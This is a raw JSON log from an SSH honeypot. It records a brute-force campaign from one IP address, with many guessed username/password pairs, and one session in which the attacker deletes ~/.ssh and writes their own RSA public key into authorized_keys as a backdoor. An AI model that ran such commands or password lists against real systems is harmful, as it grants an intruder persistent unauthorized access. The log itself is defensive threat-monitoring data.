ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:18.708670Z","src_ip":"212.227.235.229","session":"5d163e7ff4ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36658,"dst_ip":"1.2.3.4","dst_port":22,"session":"76ef2cfd289c","protocol":"ssh","message":"New connection: 212.227.235.229:36658 (1.2.3.4:22) [session: 76ef2cfd289c]","sensor":"my-vps","timestamp":"2025-09-08T23:00:18.775954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:18.777126Z","src_ip":"212.227.235.229","session":"76ef2cfd289c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:18.856423Z","src_ip":"212.227.235.229","session":"15e5869c2ad1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41346,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c35150db116","protocol":"ssh","message":"New connection: 212.227.235.229:41346 (1.2.3.4:22) [session: 1c35150db116]","sensor":"my-vps","timestamp":"2025-09-08T23:00:19.087502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:19.088508Z","src_ip":"212.227.235.229","session":"1c35150db116"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:19.119148Z","src_ip":"212.227.235.229","session":"76ef2cfd289c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:19.319728Z","src_ip":"212.227.235.229","session":"1c35150db116"}
{"eventid":"cowrie.login.failed","username":"gaoyuan","password":"111","message":"login attempt [gaoyuan/111] failed","sensor":"my-vps","timestamp":"2025-09-08T23:00:19.997488Z","src_ip":"212.227.235.229","session":"5d163e7ff4ca"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:00:20.354062Z","src_ip":"212.227.235.229","session":"1c35150db116"}
{"eventid":"cowrie.login.failed","username":"gitrun","password":"gitrun@123","message":"login attempt [gitrun/gitrun@123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:00:20.531278Z","src_ip":"212.227.235.229","session":"76ef2cfd289c"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:20.587269Z","src_ip":"212.227.235.229","session":"42d259580f38"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:20.588290Z","src_ip":"212.227.235.229","session":"1c35150db116"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:21.311870Z","src_ip":"212.227.235.229","session":"5d163e7ff4ca"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:21.875280Z","src_ip":"212.227.235.229","session":"76ef2cfd289c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54130,"dst_ip":"1.2.3.4","dst_port":22,"session":"291ca5618725","protocol":"ssh","message":"New connection: 212.227.235.229:54130 (1.2.3.4:22) [session: 291ca5618725]","sensor":"my-vps","timestamp":"2025-09-08T23:00:23.986469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:23.987591Z","src_ip":"212.227.235.229","session":"291ca5618725"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:24.082565Z","src_ip":"212.227.235.229","session":"291ca5618725"}
{"eventid":"cowrie.login.success","username":"root","password":"QAZ123wsx","message":"login attempt [root/QAZ123wsx] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:00:24.502717Z","src_ip":"212.227.235.229","session":"291ca5618725"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:00:24.743717Z","src_ip":"212.227.235.229","session":"291ca5618725"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:00:24.744411Z","src_ip":"212.227.235.229","session":"291ca5618725"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:00:24.745817Z","src_ip":"212.227.235.229","session":"291ca5618725"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:24.842238Z","src_ip":"212.227.235.229","session":"291ca5618725"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:00:25.089874Z","src_ip":"212.227.235.229","session":"291ca5618725"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:00:25.090554Z","src_ip":"212.227.235.229","session":"291ca5618725"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:00:25.187686Z","src_ip":"212.227.235.229","session":"291ca5618725"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:25.188622Z","src_ip":"212.227.235.229","session":"291ca5618725"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47162,"dst_ip":"1.2.3.4","dst_port":22,"session":"a26cbe8a6258","protocol":"ssh","message":"New connection: 212.227.235.229:47162 (1.2.3.4:22) [session: a26cbe8a6258]","sensor":"my-vps","timestamp":"2025-09-08T23:00:25.261933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:25.262887Z","src_ip":"212.227.235.229","session":"a26cbe8a6258"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54132,"dst_ip":"1.2.3.4","dst_port":22,"session":"181d55ebd9f8","protocol":"ssh","message":"New connection: 212.227.235.229:54132 (1.2.3.4:22) [session: 181d55ebd9f8]","sensor":"my-vps","timestamp":"2025-09-08T23:00:25.281836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:25.282724Z","src_ip":"212.227.235.229","session":"181d55ebd9f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:25.377388Z","src_ip":"212.227.235.229","session":"181d55ebd9f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:25.573365Z","src_ip":"212.227.235.229","session":"a26cbe8a6258"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:00:25.759635Z","src_ip":"212.227.235.229","session":"181d55ebd9f8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:26.857083Z","src_ip":"212.227.235.229","session":"181d55ebd9f8"}
{"eventid":"cowrie.login.failed","username":"proradis","password":"liverovast#adkz443","message":"login attempt [proradis/liverovast#adkz443] failed","sensor":"my-vps","timestamp":"2025-09-08T23:00:26.859342Z","src_ip":"212.227.235.229","session":"a26cbe8a6258"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52600,"dst_ip":"1.2.3.4","dst_port":22,"session":"d79c1ce7b472","protocol":"ssh","message":"New connection: 212.227.235.229:52600 (1.2.3.4:22) [session: d79c1ce7b472]","sensor":"my-vps","timestamp":"2025-09-08T23:00:26.953365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:26.954162Z","src_ip":"212.227.235.229","session":"d79c1ce7b472"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:27.052947Z","src_ip":"212.227.235.229","session":"d79c1ce7b472"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:00:27.481919Z","src_ip":"212.227.235.229","session":"d79c1ce7b472"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:27.582544Z","src_ip":"212.227.235.229","session":"291ca5618725"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:27.584008Z","src_ip":"212.227.235.229","session":"d79c1ce7b472"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:28.173831Z","src_ip":"212.227.235.229","session":"a26cbe8a6258"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57650,"dst_ip":"1.2.3.4","dst_port":22,"session":"06deba5dafbd","protocol":"ssh","message":"New connection: 212.227.235.229:57650 (1.2.3.4:22) [session: 06deba5dafbd]","sensor":"my-vps","timestamp":"2025-09-08T23:00:34.221439Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:34.222090Z","src_ip":"212.227.235.229","session":"06deba5dafbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:34.358909Z","src_ip":"212.227.235.229","session":"06deba5dafbd"}
{"eventid":"cowrie.login.failed","username":"dolphins","password":"123456789","message":"login attempt [dolphins/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T23:00:34.942535Z","src_ip":"212.227.235.229","session":"06deba5dafbd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:36.077864Z","src_ip":"212.227.235.229","session":"06deba5dafbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59828,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c1e8bb6dcb7","protocol":"ssh","message":"New connection: 212.227.235.229:59828 (1.2.3.4:22) [session: 1c1e8bb6dcb7]","sensor":"my-vps","timestamp":"2025-09-08T23:00:39.858922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:39.859700Z","src_ip":"212.227.235.229","session":"1c1e8bb6dcb7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:40.094145Z","src_ip":"212.227.235.229","session":"1c1e8bb6dcb7"}
{"eventid":"cowrie.login.failed","username":"db2inst1","password":"password","message":"login attempt [db2inst1/password] failed","sensor":"my-vps","timestamp":"2025-09-08T23:00:41.070250Z","src_ip":"212.227.235.229","session":"1c1e8bb6dcb7"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:42.306310Z","src_ip":"212.227.235.229","session":"1c1e8bb6dcb7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60228,"dst_ip":"1.2.3.4","dst_port":22,"session":"901659b18081","protocol":"ssh","message":"New connection: 212.227.235.229:60228 (1.2.3.4:22) [session: 901659b18081]","sensor":"my-vps","timestamp":"2025-09-08T23:00:55.442508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:55.443521Z","src_ip":"212.227.235.229","session":"901659b18081"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.95","src_port":54772,"dst_ip":"1.2.3.4","dst_port":22,"session":"73c864e0a7c0","protocol":"ssh","message":"New connection: 92.118.39.95:54772 (1.2.3.4:22) [session: 73c864e0a7c0]","sensor":"my-vps","timestamp":"2025-09-08T23:00:55.557691Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:55.644680Z","src_ip":"92.118.39.95","session":"73c864e0a7c0"}
